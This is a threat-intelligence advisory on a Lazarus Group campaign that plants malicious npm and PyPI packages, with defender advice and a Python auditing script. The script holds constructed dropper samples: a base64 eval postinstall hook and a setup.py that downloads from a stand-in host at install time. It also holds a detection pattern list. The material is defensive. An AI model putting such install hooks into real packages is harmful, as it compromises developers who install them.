Lazarus Campaign Plants Malicious Packages in npm and PyPI Ecosystems
Summary
The Lazarus Group, an APT linked to North Korea, is combining a fake recruitment campaign with malicious packages planted in the npm and PyPI registries. The campaign, codenamed graphalgo, has been active since May 2025; its packages are built to compromise the machines of the developers who install them.
IFF Assessment
FOE
A known APT group is actively targeting software supply chains with malicious packages.
Severity
8.1
High
(AI Estimated)
Defender Context
This activity illustrates the growing risk of supply chain attacks that abuse open-source package registries, where a package can execute code on a developer's machine at install time before any of its API is ever called. Defenders should run software composition analysis (SCA) against every dependency manifest, pin dependencies with lockfiles and verify the recorded integrity hashes before install, and review or disable install-time hooks (npm lifecycle scripts such as postinstall, or a setup.py that overrides the install command; `npm install --ignore-scripts` and installing Python packages from wheels only with `pip install --only-binary=:all:` remove the most common execution paths). Developers should be told to treat packages that are newly published, have few downloads, or mimic the name of a popular library as suspect, and to treat unsolicited coding tests or repositories sent by "recruiters" as a likely lure. Because these implants typically call home, egress monitoring for unusual connections initiated by development machines, and alerting on processes spawned by package managers, is also crucial.
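The integrity and install-script checks described above, as an added example that is not code from the original advisory or from any vendor tooling: it verifies a downloaded npm tarball against the Subresource Integrity string a lockfile records, then flags package.json lifecycle scripts and setup.py install overrides that would run code during installation. The package data, tarball bytes and file contents are constructed for the example; the regex heuristics are an assumed starting list, not a detection signature for this campaign.

```python
"""Added example, not code from the original advisory: offline checks for an npm
or PyPI package before it is allowed onto a developer machine.

  verify_integrity   - compares a downloaded tarball with the Subresource
                       Integrity string npm records in package-lock.json
                       ("sha512-<base64 digest>").
  audit_npm_manifest - flags package.json lifecycle scripts that execute at
                       install time, and patterns inside them that commonly
                       appear in install-time droppers.
  audit_setup_py     - flags a setup.py that overrides the install command
                       (arbitrary code at `pip install` time) or fetches code.

All package data below is constructed for the example."""
import base64
import hashlib
import hmac
import re

# Lifecycle scripts npm runs during `npm install` without any explicit opt-in.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# (regex, reason). Assumed heuristics, not proof: each hit is a reason to read the script.
SUSPICIOUS_PATTERNS = [
    (r"\bcurl\b|\bwget\b|\bInvoke-WebRequest\b", "downloads a remote payload"),
    (r"https?://", "references a URL"),
    (r"\beval\(|new Function\(|\bexec\(", "evaluates dynamically built code"),
    (r"base64", "decodes base64 (often a hidden payload)"),
    (r"child_process|subprocess|os\.system", "spawns a process"),
]


def sri_digest(data: bytes, algo: str = "sha512") -> str:
    """Subresource Integrity string for a tarball, in the form npm writes to package-lock.json."""
    return f"{algo}-" + base64.b64encode(hashlib.new(algo, data).digest()).decode()


def verify_integrity(tarball: bytes, expected_sri: str) -> bool:
    """True only if the tarball's digest matches the lockfile's integrity string."""
    algo, _, digest_b64 = expected_sri.partition("-")
    if algo not in ("sha512", "sha384", "sha256", "sha1") or not digest_b64:
        raise ValueError(f"unsupported integrity string: {expected_sri!r}")
    actual = base64.b64encode(hashlib.new(algo, tarball).digest()).decode()
    return hmac.compare_digest(actual, digest_b64)


def _scan(text: str) -> list[str]:
    return [why for pattern, why in SUSPICIOUS_PATTERNS if re.search(pattern, text)]


def audit_npm_manifest(manifest: dict) -> list[str]:
    """Findings for a parsed package.json; an empty list means nothing runs at install time."""
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = manifest.get("scripts", {}).get(hook)
        if cmd is None:
            continue
        findings.append(f"{hook} runs at install time: {cmd!r}")
        findings.extend(f"{hook}: {why}" for why in _scan(cmd))
    return findings


def audit_setup_py(source: str) -> list[str]:
    """Findings for a setup.py; a custom install cmdclass means code runs on `pip install`."""
    findings = []
    if re.search(r"cmdclass\s*=\s*\{[^}]*['\"](install|develop|egg_info)['\"]", source):
        findings.append("overrides an install command (code executes during pip install)")
    findings.extend(_scan(source))
    return findings


# --- constructed sample data (not a real package) -----------------------------
TARBALL = b"\x1f\x8b constructed tarball bytes, not a real package"
LOCK_ENTRY = {"version": "1.0.0", "integrity": sri_digest(TARBALL)}  # what a trusted lockfile records

BENIGN_MANIFEST = {"name": "example-lib", "scripts": {"test": "node test.js"}}
MALICIOUS_MANIFEST = {
    "name": "example-lib-utils",
    "scripts": {"postinstall": "node -e \"eval(Buffer.from(process.env.P,'base64').toString())\""},
}
MALICIOUS_SETUP = """
from setuptools import setup
from setuptools.command.install import install
import subprocess
class Hook(install):
    def run(self):
        subprocess.run(['curl','-s','http://example.invalid/x','-o','/tmp/x'])
        install.run(self)
setup(name='example-lib', version='1.0.0', cmdclass={'install': Hook})
"""

if __name__ == "__main__":
    print("tarball matches lockfile:", verify_integrity(TARBALL, LOCK_ENTRY["integrity"]))
    print("tampered tarball matches:", verify_integrity(TARBALL + b"x", LOCK_ENTRY["integrity"]))
    for name, findings in [("benign npm", audit_npm_manifest(BENIGN_MANIFEST)),
                           ("malicious npm", audit_npm_manifest(MALICIOUS_MANIFEST)),
                           ("malicious PyPI", audit_setup_py(MALICIOUS_SETUP))]:
        print(name, "->", findings or ["no install-time findings"])
```

Two caveats when adapting this. A real package-lock.json integrity field may carry several space-separated hashes; split it and accept any one that matches. And the pattern list only catches the obvious cases: a dropper can hide its network call behind string splitting or a dependency, so a hit is a reason to read the script, while a clean result is not a reason to trust it.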